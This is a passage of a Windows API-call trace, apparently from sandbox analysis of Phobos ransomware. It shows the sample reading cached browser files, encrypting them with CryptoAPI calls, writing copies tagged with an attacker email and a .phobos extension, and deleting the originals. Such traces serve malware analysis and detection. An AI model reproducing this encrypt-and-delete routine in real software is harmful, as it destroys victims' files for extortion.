HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1D;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=5;target=_blank;aduho=600;grp=852361999[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1d;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=5;target=_blank;aduho=600;grp=852361999[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.402] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32be8) returned 1 [0190.402] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.402] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1305, lpOverlapped=0x0) returned 1 [0190.403] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1310, dwBufLen=0x1310 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1310) returned 1 [0190.403] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1310, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1310, lpOverlapped=0x0) returned 1 [0190.404] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0190.404] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.404] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x150, dwBufLen=0x150 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x150) returned 1 [0190.404] CryptDestroyKey (hKey=0xa327e8) returned 1 [0190.404] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x202, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x202, lpOverlapped=0x0) returned 1 [0190.404] CryptDestroyKey (hKey=0xa32be8) returned 1 [0190.404] CloseHandle (hObject=0xac) returned 1 [0190.404] CloseHandle (hObject=0x14c) returned 1 [0190.404] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1D;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=5;target=_blank;aduho=600;grp=852361999[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1d;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=5;target=_blank;aduho=600;grp=852361999[1]")) returned 1 [0190.405] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0190.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\GoogleInstaller_de[1].application" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\googleinstaller_de[1].application"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.406] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3692) returned 1 [0190.406] CloseHandle (hObject=0x14c) returned 1 [0190.406] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\GoogleInstaller_de[1].application" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\googleinstaller_de[1].application")) returned 0x2020 [0190.406] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\GoogleInstaller_de[1].application.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\googleinstaller_de[1].application.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.406] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\GoogleInstaller_de[1].application" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\googleinstaller_de[1].application"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.406] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.406] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.407] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\GoogleInstaller_de[1].application.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\googleinstaller_de[1].application.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0190.407] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32be8) returned 1 [0190.407] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.407] ReadFile (in: hFile=0x14c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xe6c, lpOverlapped=0x0) returned 1 [0190.415] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe70, dwBufLen=0xe70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe70) returned 1 [0190.415] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe70, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe70, lpOverlapped=0x0) returned 1 [0190.416] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d28) returned 1 [0190.416] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.416] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0190.416] CryptDestroyKey (hKey=0xa32d28) returned 1 [0190.416] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0190.416] CryptDestroyKey (hKey=0xa32be8) returned 1 [0190.416] CloseHandle (hObject=0x14c) returned 1 [0190.417] CloseHandle (hObject=0xac) returned 1 [0190.417] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\GoogleInstaller_de[1].application" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\googleinstaller_de[1].application")) returned 1 [0190.418] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0190.418] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\js[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\js[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0190.419] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1225) returned 1 [0190.419] CloseHandle (hObject=0xac) returned 1 [0190.419] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\js[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\js[1]")) returned 0x2020 [0190.419] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\js[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\js[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.419] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\js[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\js[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0190.420] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.420] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.420] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\js[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\js[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.421] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32be8) returned 1 [0190.421] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.421] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4c9, lpOverlapped=0x0) returned 1 [0190.432] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4d0, dwBufLen=0x4d0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4d0) returned 1 [0190.432] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4d0, lpOverlapped=0x0) returned 1 [0190.433] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d28) returned 1 [0190.433] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.433] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0190.433] CryptDestroyKey (hKey=0xa32d28) returned 1 [0190.433] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0190.434] CryptDestroyKey (hKey=0xa32be8) returned 1 [0190.434] CloseHandle (hObject=0xac) returned 1 [0190.434] CloseHandle (hObject=0x14c) returned 1 [0190.434] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\js[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\js[1]")) returned 1 [0190.436] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0190.436] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\js[2]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\js[2]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.437] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1378) returned 1 [0190.437] CloseHandle (hObject=0x14c) returned 1 [0190.437] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\js[2]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\js[2]")) returned 0x2020 [0190.437] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\js[2].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\js[2].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.437] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\js[2]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\js[2]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.437] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.437] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.437] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\js[2].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\js[2].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0190.438] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32be8) returned 1 [0190.438] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.438] ReadFile (in: hFile=0x14c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x562, lpOverlapped=0x0) returned 1 [0190.450] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x570, dwBufLen=0x570 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x570) returned 1 [0190.450] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x570, lpOverlapped=0x0) returned 1 [0190.451] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0190.451] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.451] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0190.451] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0190.451] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0190.451] CryptDestroyKey (hKey=0xa32be8) returned 1 [0190.451] CloseHandle (hObject=0x14c) returned 1 [0190.451] CloseHandle (hObject=0xac) returned 1 [0190.451] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\js[2]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\js[2]")) returned 1 [0190.452] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0190.452] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\latest[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\latest[1].eot"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0190.453] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=31299) returned 1 [0190.453] CloseHandle (hObject=0xac) returned 1 [0190.453] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\latest[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\latest[1].eot")) returned 0x2020 [0190.453] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\latest[1].eot.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\latest[1].eot.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.453] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\latest[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\latest[1].eot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0190.455] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.457] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0190.457] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\latest[1].eot.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\latest[1].eot.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.458] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32be8) returned 1 [0190.458] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.458] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x7a43, lpOverlapped=0x0) returned 1 [0190.479] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x7a50, dwBufLen=0x7a50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x7a50) returned 1 [0190.479] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x7a50, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x7a50, lpOverlapped=0x0) returned 1 [0190.480] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0190.480] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0190.480] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0190.480] CryptDestroyKey (hKey=0xa32a28) returned 1 [0190.480] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0190.481] CryptDestroyKey (hKey=0xa32be8) returned 1 [0190.481] CloseHandle (hObject=0xac) returned 1 [0190.481] CloseHandle (hObject=0x14c) returned 1 [0190.481] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\latest[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\latest[1].eot")) returned 1 [0190.482] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0190.482] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 